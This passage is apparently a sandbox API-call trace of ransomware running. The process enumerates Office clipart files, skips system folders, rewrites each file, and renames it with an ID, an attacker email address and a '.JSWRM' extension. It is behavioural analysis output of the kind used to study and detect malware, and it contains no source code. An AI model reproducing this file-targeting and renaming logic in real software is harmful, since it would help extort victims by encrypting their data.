lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239973.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239973.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0088.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0088.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239973.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239973.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239973.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0088.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239973.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.517] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5096) returned 1 [0088.517] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13e0) returned 0x205850 [0088.517] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x13e0, lpOverlapped=0x0) returned 1 [0088.524] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.524] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x13e0, lpOverlapped=0x0) returned 1 [0088.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.524] CloseHandle (hObject=0x314) returned 1 [0088.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0088.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0088.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0088.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0088.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0088.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0088.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.525] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239973.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239973.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0088.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0088.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.526] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed05f07, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xed05f07, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xed05f07, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xda0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239975.WMF", cAlternateFileName="")) returned 1 [0088.526] lstrcmpiW (lpString1="J0239975.WMF", lpString2=".") returned 1 [0088.526] lstrcmpiW (lpString1="J0239975.WMF", lpString2="..") returned 1 [0088.526] lstrcmpiW (lpString1="J0239975.WMF", lpString2="...") returned 1 [0088.526] lstrcmpiW (lpString1="J0239975.WMF", lpString2="windows") returned -1 [0088.526] lstrcmpiW (lpString1="J0239975.WMF", lpString2="recovery") returned -1 [0088.526] lstrcmpiW (lpString1="J0239975.WMF", lpString2="perflogs") returned -1 [0088.526] lstrcmpiW (lpString1="J0239975.WMF", lpString2="documents and settings") returned 1 [0088.526] lstrcmpiW (lpString1="J0239975.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.526] lstrcmpiW (lpString1="J0239975.WMF", lpString2="system volume information") returned -1 [0088.526] lstrcmpiW (lpString1="J0239975.WMF", lpString2="msocache") returned -1 [0088.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239975.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239975.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239975.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239975.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239975.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239975.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239975.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.529] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3488) returned 1 [0088.529] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xda0) returned 0x23fc98 [0088.529] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xda0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xda0, lpOverlapped=0x0) returned 1 [0088.530] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.530] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xda0, lpOverlapped=0x0) returned 1 [0088.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0088.530] CloseHandle (hObject=0x314) returned 1 [0088.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0088.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0088.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0088.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0088.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0088.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.531] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239975.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239975.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0088.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.532] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed05f07, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xed05f07, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf2fbd2e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcd8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239997.WMF", cAlternateFileName="")) returned 1 [0088.532] lstrcmpiW (lpString1="J0239997.WMF", lpString2=".") returned 1 [0088.532] lstrcmpiW (lpString1="J0239997.WMF", lpString2="..") returned 1 [0088.532] lstrcmpiW (lpString1="J0239997.WMF", lpString2="...") returned 1 [0088.532] lstrcmpiW (lpString1="J0239997.WMF", lpString2="windows") returned -1 [0088.532] lstrcmpiW (lpString1="J0239997.WMF", lpString2="recovery") returned -1 [0088.532] lstrcmpiW (lpString1="J0239997.WMF", lpString2="perflogs") returned -1 [0088.532] lstrcmpiW (lpString1="J0239997.WMF", lpString2="documents and settings") returned 1 [0088.532] lstrcmpiW (lpString1="J0239997.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.532] lstrcmpiW (lpString1="J0239997.WMF", lpString2="system volume information") returned -1 [0088.532] lstrcmpiW (lpString1="J0239997.WMF", lpString2="msocache") returned -1 [0088.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239997.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239997.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239997.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0088.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239997.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239997.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239997.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0088.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239997.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.533] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3288) returned 1 [0088.533] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcd0) returned 0x23fc98 [0088.533] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xcd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xcd0, lpOverlapped=0x0) returned 1 [0088.534] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.534] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xcd0, lpOverlapped=0x0) returned 1 [0088.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0088.535] CloseHandle (hObject=0x314) returned 1 [0088.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0088.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0088.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0088.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0088.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0088.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.535] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239997.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239997.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0088.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.536] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xed05f07, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1df8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0240157.WMF", cAlternateFileName="")) returned 1 [0088.536] lstrcmpiW (lpString1="J0240157.WMF", lpString2=".") returned 1 [0088.536] lstrcmpiW (lpString1="J0240157.WMF", lpString2="..") returned 1 [0088.536] lstrcmpiW (lpString1="J0240157.WMF", lpString2="...") returned 1 [0088.536] lstrcmpiW (lpString1="J0240157.WMF", lpString2="windows") returned -1 [0088.536] lstrcmpiW (lpString1="J0240157.WMF", lpString2="recovery") returned -1 [0088.536] lstrcmpiW (lpString1="J0240157.WMF", lpString2="perflogs") returned -1 [0088.536] lstrcmpiW (lpString1="J0240157.WMF", lpString2="documents and settings") returned 1 [0088.536] lstrcmpiW (lpString1="J0240157.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.536] lstrcmpiW (lpString1="J0240157.WMF", lpString2="system volume information") returned -1 [0088.536] lstrcmpiW (lpString1="J0240157.WMF", lpString2="msocache") returned -1 [0088.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240157.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240157.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0240157.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0088.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240157.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0240157.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0240157.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0088.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0088.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0088.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF" (normalized: "c:\\program files\\microsoft 